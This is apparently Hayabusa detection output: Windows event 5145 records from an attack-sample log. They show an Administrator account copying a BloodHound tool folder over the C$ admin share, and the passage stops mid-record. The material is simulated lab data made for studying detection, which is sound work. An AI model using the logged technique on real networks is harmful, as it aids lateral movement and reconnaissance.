2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 
23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 
23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator 
| IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from | IP 
Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
